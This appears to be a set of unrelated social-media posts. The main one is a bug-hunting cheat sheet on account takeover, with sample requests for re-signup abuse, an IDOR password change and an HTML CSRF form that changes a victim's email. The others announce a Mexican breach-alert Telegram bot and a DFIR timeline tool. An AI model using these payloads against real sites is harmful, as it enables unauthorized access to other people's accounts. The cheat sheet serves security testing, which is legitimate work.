Shiruikk

# Account Takeover ## **Introduction** Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else. ## **How to Find** 1. Using OAuth Misconfiguration = - Victim has a account in https://t.co/jQ2v94Cr3I - Attacker creates an account on https://t.co/jQ2v94Cr3I using OAuth. For example the attacker have a facebook with a registered victim email - Attacker changed his/her email to victim email. - When the victim try to create an account on https://t.co/jQ2v94Cr3I, it says the email already exists. 2. Try re-sign up using same email ``` POST /newaccount [...] [email protected]&password=1234 ``` After sign up using victim email, try signup again but using different password ``` POST /newaccount [...] [email protected]&password=hacked ``` 3. via CSRF - Create an account as an attacker and fill all the form, check your info in the Account Detail. - Change the email and capture the request, then created a CSRF Exploit. - The CSRF Exploit looks like as given below. I have replaced the email value to anyemail@*******.com and submitted a request in the victim’s account. ```html <html> <body> <form action="https://t.co/5nay6rLSjI" method="POST"> <input type="hidden" value="[email protected]"/> <input type="submit" value="Submit Request"> </form> </body> </html> ``` 4. Chaining with IDOR, for example ``` POST /changepassword.php Host: https://t.co/rGXgqk7w19 [...] userid=500&password=heked123 ``` 500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID 5. No Rate Limit on 2FA References: - [Pre-Account Takeover using OAuth Misconfiguration](https://t.co/3FCaRR1sbg) - [Account Takeover via CSRF](https://t.co/OSAu7tbrN2) - [How re-signing up for an account lead to account takeover](https://t.co/vxhiLdCqsT)

🚨Nuevo bot de ciberinteligencia en México Se acaba de vincular el sistema DataBreachMX al bot de Telegram LeaksIntelMX_bot. Qué hace: 1. Notifica automáticamente vulnerabilidades, defacements y filtraciones en México. 2. Mantiene un registro histórico de incidentes en Databreachmx y si se encuentra información previa, se la enviará. Objetivo: ayudar a organizaciones y usuarios a identificar si han sido afectados y mantenerse al día con la seguridad digital en México. 🇲🇽 Solo para México | 📢 Notificaciones automáticas en tiempo real ➡️ ¡Únete al bot, solo dale START y recibe alertas directamente en Telegram! Bot LeaksIntelMX: https://t.co/y0z4GA4Xlm Site: https://t.co/V0qyEcJltj

🛠️ Forensic-Timeliner - Windows Forensic Tool for DFIR Investigators Read more: https://t.co/6NcU0U6KSV Forensic-Timeliner, a Windows forensic tool for DFIR investigators, has released version 2.2, which offers enhanced automation and improved artifact support for digital forensics and incident response operations. This high-speed processing engine consolidates CSV output from leading triage utilities into a unified timeline, empowering analysts to reconstruct event sequences and identify key indicators of compromise rapidly. The engine applies YAML-driven filters defined in config/keywords/keywords.yaml, automatically detecting files by name, folder, or header patterns. #cybersecuritynews #DFIR #Windows